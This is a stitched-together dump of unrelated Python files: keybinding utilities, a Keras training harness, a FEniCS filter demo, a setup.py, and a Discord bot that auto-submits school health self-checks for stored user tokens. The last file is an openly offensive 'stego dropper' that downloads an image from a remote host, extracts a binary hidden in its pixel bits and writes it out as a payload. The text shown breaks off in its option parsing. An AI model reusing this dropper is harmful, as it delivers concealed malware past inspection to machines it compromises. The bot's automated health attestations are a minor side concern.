    KP_PLUS = 0xff2b
    KP_ENTER = 0xff0a
    KP_PERIOD = 0xff2e
    KP_COMMA = 0xff2c
    KP_CLEAR = 0xff20 # Keypad Clear key (on Mac?)

    # As returned by xev
    SHIFT_LEFT = 0xffe1
    SHIFT_RIGHT = 0xffe2
    CTRL_LEFT = 0xffe3
    CTRL_RIGHT = 0xffe4
    ALT_LEFT = 0xffe9
    ALT_RIGHT = 0xfe03 # ISO_Level3_Shift
    GUI_LEFT = 0xffeb
    GUI_RIGHT = 0xffec # Arbitrary value as I don't have right GUI
    MENU = 0xff67

    @classmethod
    def get(cls, name):
        """Return the member matching *name* (case-insensitive), or None."""
        return cls.__members__.get(name.upper())
# Keycodes located on the numeric keypad (used by Key.is_keypad).
KEYPAD_KEYCODES = {
    Keycode.KP_0,
    Keycode.KP_1,
    Keycode.KP_2,
    Keycode.KP_3,
    Keycode.KP_4,
    Keycode.KP_5,
    Keycode.KP_6,
    Keycode.KP_7,
    Keycode.KP_8,
    Keycode.KP_9,
    Keycode.KP_DIVIDE,
    Keycode.KP_MULTIPLY,
    Keycode.KP_MINUS,
    Keycode.KP_PLUS,
    Keycode.KP_ENTER,
    Keycode.KP_PERIOD,
    Keycode.KP_COMMA,
    Keycode.KP_CLEAR,
}
# Keycodes that are themselves modifier keys (used by Key.is_modifier).
MODIFIERS_KEYCODES = {
    Keycode.SHIFT_LEFT,
    Keycode.CTRL_LEFT,
    Keycode.ALT_LEFT,
    Keycode.GUI_LEFT,
    Keycode.SHIFT_RIGHT,
    Keycode.CTRL_RIGHT,
    Keycode.ALT_RIGHT,
    Keycode.GUI_RIGHT,
}
class Key(collections.namedtuple(
    'Key', [
        'keycode',
        'modifiers',
    ])):
    """A keycode plus a Modifier bitmask; hashable/comparable via namedtuple."""

    __slots__ = ()

    def __new__(cls, keycode, modifiers=None, ctrl=False, alt=False, shift=False, gui=False):
        # Boolean convenience flags are OR-ed into the Modifier bitmask.
        modifiers = modifiers or Modifier.NONE
        if ctrl:
            modifiers |= Modifier.CTRL
        if alt:
            modifiers |= Modifier.ALT
        if shift:
            modifiers |= Modifier.SHIFT
        if gui:
            modifiers |= Modifier.GUI
        return super().__new__(cls, keycode, modifiers)

    @property
    def is_keypad(self):
        """True if this key is on the numeric keypad."""
        return self.keycode in KEYPAD_KEYCODES

    @property
    def is_modifier(self):
        """True if this key is itself a modifier key (Shift/Ctrl/Alt/GUI)."""
        return self.keycode in MODIFIERS_KEYCODES

    def replace(self, keycode):
        """Return a Key with *keycode* substituted, for printable ASCII only.

        SHIFT is dropped from the modifiers because shift state is already
        reflected in the printable character itself; non-printable keycodes
        return self unchanged.
        """
        if keycode in ASCII_CHARS:
            keycode = ord(keycode)
        if isinstance(keycode, int) and 32 < keycode < 127:
            modifiers = self.modifiers
            if modifiers & Modifier.SHIFT:
                modifiers = self.modifiers ^ Modifier.SHIFT
            return Key(keycode, modifiers=modifiers)
        return self

    @staticmethod
    def parse(key):
        """Parse a spec like "Ctrl-Shift-a", "^c" or "F1" into a Key."""
        if isinstance(key, Key):
            return key
        modifiers = Modifier.NONE
        key = key.split('-')
        keycode = key[-1]
        if keycode.startswith('^'):
            # Leading caret is shorthand for Ctrl, e.g. "^c".
            keycode = keycode.strip('^')
            modifiers |= Modifier.CTRL
        if keycode in ASCII_CHARS:
            keycode = ord(keycode)
        else:
            keycode = Keycode.get(keycode) or Keycode.UNKNOWN
        for mod in key[0:-1]:
            modifier = Modifier.get(mod)
            if modifier:
                modifiers |= modifier
        return Key(keycode, modifiers=modifiers)

    def __str__(self):
        if 32 < self.keycode < 127:
            key = chr(self.keycode)
        elif isinstance(self.keycode, Keycode):
            key = self.keycode.name
        else:
            key = str(self.keycode)
        # Ctrl-only printable keys render with the caret shorthand ("^c").
        if (self.modifiers == Modifier.CTRL) and 32 < self.keycode < 127:
            key = f'^{key}'
        else:
            if self.modifiers & Modifier.SHIFT:
                key = f'Shift-{key}'
            if self.modifiers & Modifier.ALT:
                key = f'Alt-{key}'
            if self.modifiers & Modifier.CTRL:
                key = f'Ctrl-{key}'
            if self.modifiers & Modifier.GUI:
                key = f'Super-{key}'
        return key
class Bindings(collections.defaultdict):
    """Maps action name -> set of Key objects; missing names yield empty sets."""

    def __init__(self):
        super().__init__(set)

    def __getattr__(self, name):
        # Attribute-style access: bindings.quit == bindings['quit']
        return self[name]

    @staticmethod
    def parse(data):
        """Build Bindings from {action: [key-spec, ...]} using Key.parse."""
        bindings = Bindings()
        for name, keys in data.items():
            bindings[name].update(map(Key.parse, keys))
        return bindings
class KeyBindings:
    """Lazy, loader-backed collection of per-category Bindings."""

    def __init__(self, loader):
        self.loader = loader
        self._bindings = None  # parsed lazily on first access

    @property
    def bindings(self):
        """Load and parse the binding data on first access, then cache it."""
        if self._bindings is None:
            data = self.loader.load()
            self._bindings = self.parse_bindings(data)
        return self._bindings

    def parse_bindings(self, data):
        """Turn {category: {action: [key-spec, ...]}} into Bindings per category."""
        bindings = collections.defaultdict(Bindings)
        for category, bindings_data in data.items():
            bindings[category] = Bindings.parse(bindings_data)
        return bindings

    def get(self, key_binding):
        """Resolve "category.name" to its key set; non-strings pass through."""
        if not isinstance(key_binding, str):
            return key_binding
        category, sep, name = key_binding.partition('.')
        bindings = self.bindings[category]
        return bindings[name]

    def __getattr__(self, name):
        return self.bindings[name]
| StarcoderdataPython |
11330868 | <gh_stars>0
import json
import os
from abc import abstractmethod
from datetime import datetime
import keras
import keras.backend as K
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from callbacks.common import RedirectModel
from callbacks.eval import Evaluate
from callbacks.learning_scheduler import LearningRateScheduler, lr_step_decay
from loader.loader import Generator
from model.vlt_model import yolo_body, yolo_loss
class Executor(object):
    """Base harness: loads config and data, builds the yolo model and callbacks."""

    def __init__(self, config, GPUS=1, debug=False):
        # settings
        self.config = config
        self.debug = debug
        self.GPUS = GPUS
        self.input_shape = (self.config.input_size, self.config.input_size, 3) # multiple of 32, hw
        self.word_len = self.config.word_len
        self.embed_dim = self.config.embed_dim
        self.seg_out_stride = self.config.seg_out_stride
        self.start_epoch = self.config.start_epoch
        self.n_freeze = 185 + 12
        # data init
        self.dataset = {}
        self.dataset_len = {}
        self.load_data()
        # create model
        self.yolo_model, self.yolo_body, self.yolo_body_single = self.create_model()
        # call_back_init
        self.callbacks = self.build_callbacks()

    def create_model(self):
        """Build (training model with loss, possibly multi-GPU body, single-GPU body)."""
        print('Creating model...')
        K.clear_session() # get a new session
        image_input = Input(shape=(self.input_shape))
        q_input = Input(shape=[self.word_len, self.embed_dim], name='q_input')
        h, w, _ = self.input_shape
        seg_gt = Input(shape=(h//self.seg_out_stride, w//self.seg_out_stride, 1))
        # mask_size = self.config.input_size // self.config.seg_out_stride
        model_body = yolo_body(image_input, q_input, self.config)
        print('Loading model...')
        self.load_model(model_body)
        if self.GPUS > 1:
            print("Using {} GPUs".format(self.GPUS))
            model_body_para = keras.utils.multi_gpu_model(model_body, gpus=self.GPUS)
        else:
            print("Using SINGLE GPU Only")
            model_body_para = model_body
        # Wrap the loss computation in a Lambda layer so the training model
        # outputs the scalar loss directly.
        model_loss = Lambda(yolo_loss,
                            output_shape=(1,),
                            name='yolo_loss',
                            arguments={'batch_size': self.config.batch_size})(
            [model_body_para.output, seg_gt])
        model = Model([model_body_para.input[0],
                       model_body_para.input[1],
                       seg_gt], model_loss)
        print('Model created.')
        return model, model_body_para, model_body

    def load_dataset(self, split):
        """Load the JSON annotation list named by config[split]; truncated to 50 in debug mode."""
        with open(self.config[split], 'rb') as f:
            data_lines = json.load(f)
        if self.debug:
            data_lines = data_lines[:50]
        set_num = len(data_lines)
        print('Dataset Loaded: %s, Len: %d' % (split, set_num))
        return data_lines, set_num

    # NOTE(review): these abstract stubs omit `self`; harmless here because
    # every subclass overrides them.
    @abstractmethod
    def build_callbacks():
        pass

    @abstractmethod
    def load_model():
        pass

    @abstractmethod
    def load_data():
        pass
class Trainer(Executor):
    """Executor that fine-tunes from pretrained weights and logs to TensorBoard."""

    def __init__(self, config, log_path, verbose=False, **kwargs):
        self.load_path = config.pretrained_weights
        self.log_path = log_path
        self.verbose = verbose
        # checkpoints go under <log_path>/models; a copy of the config is dumped there
        self.model_path = os.path.join(self.log_path, 'models')
        if not os.path.exists(self.model_path):
            os.makedirs(self.model_path)
        json.dump(config, open(os.path.join(self.model_path, 'config.json'), 'w'))
        # per-run TensorBoard directory named by timestamp
        timestr = datetime.now().strftime('%m_%d_%H_%M_%S')
        self.tb_path = os.path.join(self.log_path, timestr)
        if not os.path.exists(self.tb_path):
            os.makedirs(self.tb_path)
        json.dump(config, open(os.path.join(self.tb_path, 'config.json'), 'w'))
        super(Trainer, self).__init__(config, **kwargs)

    def load_model(self, model_body):
        """Load pretrained weights and optionally freeze part of the body."""
        path = self.config.pretrained_weights
        model_body.load_weights(path, by_name=True, skip_mismatch=True)
        print('Loading weights from {}.'.format(path))
        if self.config.free_body in [1, 2]:
            # Freeze darknet53 body or freeze all but 3 output layers.
            num = (self.n_freeze, len(model_body.layers) - 3)[self.config.free_body - 1]
            for i in range(num):
                model_body.layers[i].trainable = False
            print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))

    def load_data(self):
        """Load train and validation splits and build the training generator."""
        self.dataset['val'], self.dataset_len['val'] = self.load_dataset('evaluate_set')
        self.dataset['train'], self.dataset_len['train'] = self.load_dataset('train_set')
        self.train_generator = Generator(self.dataset['train'], self.config)
        # self.train_generator.__getitem__(1)

    def build_callbacks(self):
        """TensorBoard, evaluation, best-IoU checkpointing and LR schedule."""
        call_backs = []
        logging = TensorBoard(log_dir=self.tb_path)
        call_backs.append(logging)
        model_evaluate = Evaluate(self.dataset['val'], self.config, tensorboard=logging)
        call_backs.append(RedirectModel(model_evaluate, self.yolo_body))
        checkpoint_map = ModelCheckpoint(self.log_path + '/models/best_map.h5',
                                         verbose=1,
                                         save_best_only=True,
                                         save_weights_only=True,
                                         monitor="seg_iou",
                                         mode='max')
        # checkpoint the single-GPU body so weights stay loadable without multi-GPU wrapping
        call_backs.append(RedirectModel(checkpoint_map, self.yolo_body_single))
        lr_schedue = LearningRateScheduler(lr_step_decay(self.config.lr, self.config.steps),
                                           logging, verbose=1,
                                           init_epoch=self.config.start_epoch)
        call_backs.append(lr_schedue)
        return call_backs

    def train(self):
        """Compile the loss-wrapped model and run fit_generator."""
        # Yolo Compile
        print('Compiling model... ')
        # The model's output IS the loss, so the loss function just passes it through.
        self.yolo_model.compile(loss={'yolo_loss': lambda y_true, y_pred: y_pred},
                                optimizer=Adam(lr=self.config.lr))
        if self.config.workers > 0:
            use_multiprocessing = True
        else:
            use_multiprocessing = False
        print('Starting training:')
        self.yolo_model.fit_generator(self.train_generator,
                                      callbacks=self.callbacks,
                                      epochs=self.config.epoches,
                                      initial_epoch=self.config.start_epoch,
                                      verbose=True,
                                      workers=self.config.workers,
                                      use_multiprocessing=use_multiprocessing,
                                      max_queue_size=self.config.max_queue_size
                                      )
class Tester(Executor):
    """Executor that evaluates a trained model on the evaluate split."""

    def __init__(self, config, **kwargs):
        super(Tester, self).__init__(config, **kwargs)

    def build_callbacks(self):
        """Create the evaluation callback bound to the (possibly parallel) body."""
        self.evaluator = RedirectModel(Evaluate(self.dataset['val'], self.config, phase='test'), self.yolo_body)
        self.evaluator.on_train_begin()

    def load_data(self):
        """Only the evaluation split is needed for testing."""
        self.dataset['val'], self.dataset_len['val'] = self.load_dataset('evaluate_set')

    def load_model(self, model_body):
        """Load the full evaluation checkpoint (strict: by_name/skip_mismatch off)."""
        model_body.load_weights(self.config.evaluate_model, by_name=False, skip_mismatch=False)
        print('Load weights {}.'.format(self.config.evaluate_model))

    def eval(self):
        """Run evaluation and dump seg IoU/precision to a timestamped text file."""
        results = dict()
        self.evaluator.on_epoch_end(-1, results)
        seg_iou = results['seg_iou']
        seg_prec = results['seg_prec']
        # dump results to text file
        if not os.path.exists('result/'):
            os.mkdir('result/')
        from datetime import datetime
        timestr = datetime.now().strftime('%m_%d_%H_%M_%S')
        with open('result/result_%s.txt' % (timestr), 'w') as f_w:
            f_w.write('segmentation result:' + '\n')
            f_w.write('seg_iou: %.4f\n' % (seg_iou))
            for item in seg_prec:
                f_w.write('prec@%.2f: %.4f' % (item, seg_prec[item])+'\n')
            f_w.write('\n')
class ImageSentenceTester(Executor):
    """Executor that runs inference on ad-hoc (image path, sentence) pairs."""

    def __init__(self, config, **kwargs):
        super(ImageSentenceTester, self).__init__(config, **kwargs)

    def build_callbacks(self):
        # build evaluator with dummy data set to testing
        self.evaluator = RedirectModel(Evaluate([-1]*1000, self.config, phase='test'), self.yolo_body)
        self.evaluator.on_train_begin()

    def load_data(self):
        # no dataset needed; inputs are supplied directly to eval()
        pass

    def load_model(self, model_body):
        """Load the full evaluation checkpoint (strict loading)."""
        model_body.load_weights(self.config.evaluate_model, by_name=False, skip_mismatch=False)
        print('Load weights {}.'.format(self.config.evaluate_model))

    def eval(self, image_paths, image_sentences):
        """Run the evaluator on the given image paths and referring sentences."""
        self.evaluator.evaluate_on_image_sentence(image_paths, image_sentences)
class Debugger(Executor):
    """Single-GPU, truncated-data Executor used to sanity-check the pipeline."""

    def __init__(self, config, **kwargs):
        self.config = config
        self.debug = True
        # exercise the data pipeline once before building the model
        self.dataset, self.dataset_len = self.load_dataset('train_set')
        self.train_generator = Generator(self.dataset, self.config)
        self.train_generator.__getitem__(1)
        kwargs.update({'GPUS': 1, 'debug': True})
        super(Debugger, self).__init__(config, **kwargs)

    def build_callbacks(self):
        return None

    def load_data(self):
        return None

    def load_model(self, model_body):
        # no pretrained weights in debug mode
        return None

    def run(self):
        """Print the model summary and compile it (no training)."""
        self.yolo_model.summary()
        self.yolo_model.compile(loss={'yolo_loss': lambda y_true, y_pred: y_pred},
                                optimizer=Adam(lr=self.config.lr))
| StarcoderdataPython |
3206714 | from dolfin import *
import numpy as np
import matplotlib.pyplot as plt
import tqdm
from scipy.sparse import lil_matrix, coo_matrix
# 20x20 unit-square mesh with crossed diagonals; P1 Lagrange scalar space.
mesh = UnitSquareMesh(20,20, "crossed")
V = FunctionSpace(mesh, "P", 1)
def density_alogrithm(V, u, R=0.2):
    """Smooth *u* with a linear hat kernel of radius R over DOF coordinates.

    Builds a sparse weight matrix A with A[i, j] = R - dist(x_i, x_j) for DOF
    pairs closer than R, then returns f = A @ u as a Function on V.
    O(n^2) in the number of DOFs.
    """
    # NOTE(review): name looks like a typo for "density_algorithm"; kept to
    # avoid breaking existing callers.
    r = V.tabulate_dof_coordinates()
    A = lil_matrix((len(r), len(r)))
    for dof0, x0 in enumerate(tqdm.tqdm(r)):
        for dof1, x1 in enumerate(r):
            dist = np.linalg.norm(x0 - x1)
            if dist < R:
                A[dof0, dof1] = R - dist
    f = Function(V)
    f.vector()[:] = A * u.vector()[:]
    return f
def density_helmholtz(V, u, R=0.2):
    """Smooth *u* via a Helmholtz filter: weak form of (I - R^2 Laplacian) f = u."""
    df, f_ = TestFunction(V), TrialFunction(V)
    f = Function(V)
    af = dot(grad(df), R**2 * grad(f_)) * dx + df * f_ * dx
    Lf = df * u * dx
    solve(af==Lf, f)
    return f
# Demo: place a unit impulse at one DOF, filter it and plot the result.
u = Function(V)
u.vector()[100] = 1.
f = density_helmholtz(V,u)
print(f.vector()[:])
plot(f)
plt.show()
| StarcoderdataPython |
3360605 | from pathlib import Path
from setuptools import find_packages, setup
# Repository root (directory containing this setup.py) and the version file.
PACKAGE_ROOT = Path(__file__).parent
VERSION = PACKAGE_ROOT / "version.txt"
def read_requirements(name: str):
    """Parse a requirements file into a list of install_requires entries.

    Blank lines and comment lines are skipped; inline "# ..." comments are
    stripped; "file:relative/path" entries are rewritten as PEP 508 direct
    references ("name @ file://...").
    """
    path = PACKAGE_ROOT.joinpath(name)
    requirements = []
    for raw in path.read_text().splitlines():
        if not raw or raw.startswith("#"):
            continue
        entry = raw.split("# ")[0].strip()
        if entry.startswith("file:"):
            relative = Path(entry[len("file:"):])
            virtual = Path("localhost", PACKAGE_ROOT.relative_to("/"), relative)
            entry = f"{relative.name} @ file://{virtual}"
        requirements.append(entry)
    return requirements
# Package metadata; long_description is read straight from readme.md.
setup(
    name="patray",
    version=VERSION.read_text().strip(),
    packages=find_packages(),
    url="https://github.com/pohmelie/patray",
    author="pohmelie",
    author_email="<EMAIL>",
    long_description=Path("readme.md").read_text(),
    long_description_content_type="text/markdown",
    license="MIT",
    license_file="license.txt",
    package_data={
        "": ["*.txt", "*.template"],
    },
    install_requires=read_requirements("requirements/production.txt"),
    extras_require={
        "dev": read_requirements("requirements/dev.txt"),
    },
)
| StarcoderdataPython |
1737328 | import asyncio
import discord
import json
import os
import logging
import DBSkr
import hcskr
from discord.ext import commands
from pymongo import MongoClient
# MongoDB connection for the "jindan" self-check bot; userinfo holds per-user tokens.
my_client = MongoClient("mongodb://localhost:27017/")
mydb = my_client['jindan']
mycol = mydb['userinfo']
loop = asyncio.get_event_loop()
def get_bot_settings() -> dict:
    """Read and parse bot_settings.json from the working directory."""
    with open('bot_settings.json', 'r', encoding="UTF-8") as settings_file:
        return json.loads(settings_file.read())
# File logging for discord.py, one log file per configured bot name.
logger = logging.getLogger('discord')
logging.basicConfig(level=logging.INFO) # DEBUG/INFO/WARNING/ERROR/CRITICAL
handler = logging.FileHandler(filename=f'{get_bot_settings()["bot_name"]}.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)

# Token selection: when "debug" is true in the settings file, the
# "canary_token" settings key is used instead of "stable_token".
token = "stable_token"
if get_bot_settings()["debug"]:
    """
    만약에 봇 설정 파일에 debug 항목이 true로 되있다면 stable_token이 아닌 canary_token이 불러와집니다.
    이를 원하지 않는다면 debug를 false로 해주세요.
    """
    token = "canary_token"
    print("Bot running in debug mode.")
async def get_prefix(bot, message):
    """Command-prefix callable: configured default prefix plus bot mention."""
    return commands.when_mentioned_or(*[get_bot_settings()["default_prefix"]])(bot, message)
# Sharded bot with all gateway intents; DBSkr auto-posts server stats to koreanbots.
intents = discord.Intents().all()
bot = commands.AutoShardedBot(command_prefix=get_prefix, intents=intents, help_command=None)
Bot = DBSkr.client(bot, koreanbots=get_bot_settings()["koreanbots"], autopost=True)
async def is_whitelisted(ctx):
    """Command check: only users on the configured whitelist may run the command."""
    return ctx.author.id in get_bot_settings()["whitelist"]
async def change_presence():
    """Rotate the bot's status message forever, changing every 10 seconds."""
    while True:
        try:
            await bot.change_presence(
                activity=discord.Game("!명령어 : 도움말"),
                status=discord.Status.online,
                afk=False
            )
            await asyncio.sleep(10)
            await bot.change_presence(
                activity=discord.Game("%d개의 서버에서 활동중!" % len(bot.guilds)),
                status=discord.Status.online,
                afk=False
            )
            await asyncio.sleep(10)
            await bot.change_presence(
                activity=discord.Game("%d명의 유저들이 사용" % len(bot.users)),
                status=discord.Status.online,
                afk=False
            )
            await asyncio.sleep(10)
        except Exception:
            # NOTE(review): broad except keeps the loop alive but silently
            # swallows all errors; consider logging them.
            pass
@commands.check(is_whitelisted)
@bot.command(name="자가진단실행", usage=f"start")
@commands.dm_only()
async def autojinstart(ctx):
    """Run the HCS self-check for every stored user token and notify each user."""
    list = mycol.find()  # NOTE(review): shadows the builtin `list`
    for token in list:
        # result is never checked — TODO confirm whether failures should be reported
        result = await hcskr.asyncTokenSelfCheck(token["token"])
        user_id = token["user_id"]
        embed = discord.embeds.Embed(title=f"금일 자가진단 완료", description=f"<@{user_id}> 님의 금일 자가진단을 수행하였습니다!",
                                     author=ctx.author)
        member = discord.utils.get(bot.get_all_members(), id=user_id)
        # NOTE(review): this sends to the invoking DM channel with `member` as the
        # message content; `member.send(embed=embed)` may have been intended — confirm.
        await ctx.send(member, embed=embed)
@bot.event
async def on_ready():
    """Called once the gateway connection is ready."""
    logger.info("Bot online.")
@bot.event
async def on_guild_join(guild):
    """Announce new guild joins (with the current guild count) to the log channel."""
    await bot.get_channel(int(819606568508850205)).send(f'새로운 서버에 추가됨 (현재 **{len(bot.guilds)}**개의 서버)')
@bot.command(name="패치노트", aliases=["patchnote"])
@commands.check(is_whitelisted)
async def patnote(ctx, *, arg):
    """Whitelist-only: post *arg* verbatim to the patch-notes channel."""
    await bot.get_channel(int(819605008688480287)).send(arg)
@bot.command(name="cog", aliases=["cogs", "코그"])
@commands.check(is_whitelisted)
async def _cog_panel(ctx):
    """Interactive reaction-driven panel to load/unload/reload cogs (whitelist only)."""
    # panel control emojis
    load = "⏺"
    unload = "⏏"
    reload = "🔄"
    up = "⬆"
    down = "⬇"
    stop = "⏹"
    emoji_list = [load, unload, reload, up, down, stop]
    msg = await ctx.send("잠시만 기다려주세요...")
    for x in emoji_list:
        await msg.add_reaction(x)
    cog_list = [c.replace(".py", "") for c in os.listdir("./cogs") if c.endswith(".py")]
    cogs_dict = {}
    base_embed = discord.Embed(title=f"{get_bot_settings()['bot_name']} Cog 관리 패널",
                               description=f"`cogs` 폴더의 Cog 개수: {len(cog_list)}개",
                               color=discord.Color.from_rgb(225, 225, 225))
    # map each on-disk cog to whether it is currently loaded
    for x in cog_list:
        if x in [x.lower() for x in bot.cogs.keys()]:
            cogs_dict[x] = True
        else:
            cogs_dict[x] = False
    cogs_keys = [x for x in cogs_dict.keys()]
    selected = cogs_keys[0]
    selected_num = 0

    def check(reaction, user):
        # only accept the panel emojis, from the invoking user, on this message
        return user == ctx.author and str(reaction) in emoji_list and reaction.message.id == msg.id

    while True:
        # redraw the panel with the current selection marked by "▶"
        tgt_embed = base_embed.copy()
        for k, v in cogs_dict.items():
            if k == selected:
                k = "▶" + k
            tgt_embed.add_field(name=k, value=f"상태: {'로드됨' if v else '언로드됨'}", inline=False)
        await msg.edit(content=None, embed=tgt_embed)
        try:
            reaction = (await bot.wait_for("reaction_add", check=check, timeout=60))[0]
        except asyncio.TimeoutError:
            # close the panel after 60s of inactivity
            try:
                await msg.clear_reactions()
            except discord.Forbidden:
                [await msg.remove_reaction(x) for x in emoji_list]
            await msg.edit(content="Cog 관리 패널이 닫혔습니다.", embed=None)
            break
        if str(reaction) == down:
            if selected_num + 1 == len(cogs_keys):
                wd = await ctx.send("이미 마지막 Cog 입니다.")
                await wd.delete(delay=3)
            else:
                selected_num += 1
                selected = cogs_keys[selected_num]
        elif str(reaction) == up:
            if selected_num == 0:
                wd = await ctx.send("이미 첫번째 Cog 입니다.")
                await wd.delete(delay=3)
            else:
                selected_num -= 1
                selected = cogs_keys[selected_num]
        elif str(reaction) == reload:
            if not cogs_dict[selected]:
                wd = await ctx.send("먼저 Cog를 로드해주세요.")
                await wd.delete(delay=3)
            else:
                bot.reload_extension("cogs." + selected)
        elif str(reaction) == unload:
            if not cogs_dict[selected]:
                wd = await ctx.send("이미 Cog가 언로드되있습니다.")
                await wd.delete(delay=3)
            else:
                bot.unload_extension("cogs." + selected)
                cogs_dict[selected] = False
        elif str(reaction) == load:
            if cogs_dict[selected]:
                wd = await ctx.send("이미 Cog가 로드되있습니다.")
                await wd.delete(delay=3)
            else:
                bot.load_extension("cogs." + selected)
                cogs_dict[selected] = True
        elif str(reaction) == stop:
            await msg.clear_reactions()
            await msg.edit(content="Cog 관리 패널이 닫혔습니다.", embed=None)
            break
        try:
            # remove the user's reaction so the same emoji can be pressed again
            await msg.remove_reaction(reaction, ctx.author)
        except discord.Forbidden:
            pass
# Load every cog module found in ./cogs.
[bot.load_extension(f"cogs.{x.replace('.py', '')}") for x in os.listdir("./cogs") if x.endswith('.py')]
# Schedule the rotating-presence task before the loop starts.
loop.create_task(change_presence())
# Start the bot (blocking) with the selected token.
bot.run(get_bot_settings()[token])
| StarcoderdataPython |
3501107 | <filename>dropper.py
#!/usr/bin/python
# Stego Dropper For Pentesters v0.1
# Heavily uses parts from https://github.com/RobinDavid/LSB-Steganography
import urllib
import urllib2
import httplib
import subprocess
import sys
import os
import string
import cv2.cv as cv
import logging
from optparse import OptionParser
# TURN THIS ON IF YOU WANT PROXY SUPPORT ("ON" / "OFF")
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"
class SteganographyException(Exception):
    """Raised when data cannot be hidden in or extracted from the carrier image."""
    pass
class LSBSteg():
    """Least-significant-bit steganography over an OpenCV image.

    Bits are read/written channel by channel, pixel by pixel; once the whole
    image has been consumed at one bit position, the next more significant
    bit plane is used (tracked by the maskONE/maskZERO pairs).
    """

    def __init__(self, im):
        self.image = im
        self.width = im.width
        self.height = im.height
        self.size = self.width * self.height
        self.nbchannels = im.channels
        self.maskONEValues = [1,2,4,8,16,32,64,128]
        # Mask used to put one ex:1->00000001, 2->00000010 .. associated with OR bitwise
        self.maskONE = self.maskONEValues.pop(0)  # Will be used to do bitwise operations
        self.maskZEROValues = [254,253,251,247,239,223,191,127]
        # Mask used to put zero ex:254->11111110, 253->11111101 .. associated with AND bitwise
        self.maskZERO = self.maskZEROValues.pop(0)
        self.curwidth = 0   # Current width position
        self.curheight = 0  # Current height position
        self.curchan = 0    # Current channel position

    def saveImage(self, filename):
        """Save the carrier image using the given filename."""
        cv.SaveImage(filename, self.image)

    def putBinaryValue(self, bits):
        """Write the bit string *bits* into the image at the current cursor."""
        for c in bits:
            val = list(self.image[self.curwidth, self.curheight])  # pixel value as a list
            if int(c) == 1:
                val[self.curchan] = int(val[self.curchan]) | self.maskONE  # OR with maskONE
            else:
                val[self.curchan] = int(val[self.curchan]) & self.maskZERO  # AND with maskZERO
            self.image[self.curwidth, self.curheight] = tuple(val)
            self.nextSpace()  # Move "cursor" to the next space

    def nextSpace(self):
        """Advance the cursor to the next slot where a bit can be read/written."""
        if self.curchan == self.nbchannels - 1:  # Next space is the following channel
            self.curchan = 0
            if self.curwidth == self.width - 1:  # Or the first channel of the next pixel of the same line
                self.curwidth = 0
                if self.curheight == self.height - 1:  # Or the first channel of the first pixel of the next line
                    self.curheight = 0
                    if self.maskONE == 128:  # Mask 10000000, so the last mask
                        # Fixed: parenthesized raise (the old `raise X, "msg"` form
                        # is Python-2-only syntax).
                        raise SteganographyException("Image filled")
                    else:  # Or instead of using the first bit start using the second and so on..
                        self.maskONE = self.maskONEValues.pop(0)
                        self.maskZERO = self.maskZEROValues.pop(0)
                else:
                    self.curheight += 1
            else:
                self.curwidth += 1
        else:
            self.curchan += 1

    def readBit(self):
        """Read a single hidden bit from the image, returning "1" or "0"."""
        val = self.image[self.curwidth, self.curheight][self.curchan]
        val = int(val) & self.maskONE
        self.nextSpace()
        if val > 0:
            return "1"
        else:
            return "0"

    def readByte(self):
        """Read eight bits as a string."""
        return self.readBits(8)

    def readBits(self, nb):
        """Read *nb* bits and return them as a "0"/"1" string."""
        bits = ""
        for i in range(nb):
            bits += self.readBit()
        return bits

    def byteValue(self, val):
        """Return *val* as an 8-character binary string."""
        return self.binValue(val, 8)

    def binValue(self, val, bitsize):
        """Return *val* as a zero-padded binary string of length *bitsize*."""
        binval = bin(val)[2:]
        if len(binval) > bitsize:
            # Fixed: parenthesized raise (Python 2/3 compatible).
            raise SteganographyException("binary value larger than the expected size")
        while len(binval) < bitsize:
            binval = "0" + binval
        return binval

    def unhideBin(self):
        """Extract hidden data: a 64-bit length header followed by that many bytes."""
        l = int(self.readBits(64), 2)
        output = ""
        for i in range(l):
            output += chr(int(self.readByte(), 2))
        return output
def drop(host, port, image, payload):
    """Download a stego image from http://host:port/image, extract the hidden
    binary with LSBSteg, and write it to `payload`.

    NOTE(review): Python 2 code (urllib2). The temp file is opened with mode
    'w' (text) although PNG data is binary — works on POSIX Python 2 only;
    'wb' would be required elsewhere. `PROXY_SUPPORT`/`PROXY_URL`/`USERNAME`/
    `PASSWORD` are module globals defined outside this chunk.
    """
    # here is where we set all of our proxy settings
    if PROXY_SUPPORT == "ON":
        auth_handler = urllib2.HTTPBasicAuthHandler()
        auth_handler.add_password(realm='RESTRICTED ACCESS',
                                  uri=PROXY_URL, # PROXY SPECIFIED ABOVE
                                  user=USERNAME, # USERNAME SPECIFIED ABOVE
                                  passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
        opener = urllib2.build_opener(auth_handler)
        urllib2.install_opener(opener)
    #Grab our file file from the web server and save it to a file
    req = urllib2.Request('http://%s:%s/%s' % (host,port,image))
    message = urllib2.urlopen(req)
    localFile = open('temp.png', 'w')
    localFile.write(message.read())
    localFile.close()
    #Destego binary
    inp = cv.LoadImage('temp.png')
    steg = LSBSteg(inp)
    bin = steg.unhideBin()
    f = open(payload,"wb") #Write the binary back to a file
    f.write(bin)
    f.close()
    # NOTE(review): shells out to `rm`; POSIX-only — os.remove would be portable.
    os.system('rm temp.png')
def main():
    """Parse CLI options (optparse), prompt for any missing ones, and run drop().

    NOTE(review): Python 2 (raw_input). Verbosity options set opts.loglevel
    but logging.basicConfig below is the only consumer.
    """
    # Setup the command line arguments.
    optp = OptionParser()
    # Output verbosity options
    optp.add_option('-q', '--quiet', help='set logging to ERROR',
                    action='store_const', dest='loglevel',
                    const=logging.ERROR, default=logging.INFO)
    optp.add_option('-d', '--debug', help='set logging to DEBUG',
                    action='store_const', dest='loglevel',
                    const=logging.DEBUG, default=logging.INFO)
    optp.add_option('-v', '--verbose', help='set logging to COMM',
                    action='store_const', dest='loglevel',
                    const=5, default=logging.INFO)
    # Image and payload options
    optp.add_option("-s", "--host", dest="host",
                    help="The server to connect to")
    optp.add_option("-p", "--port", dest="port",
                    help="The port listening on the server")
    optp.add_option("-i", "--image", dest="image",
                    help="Name of the image to download")
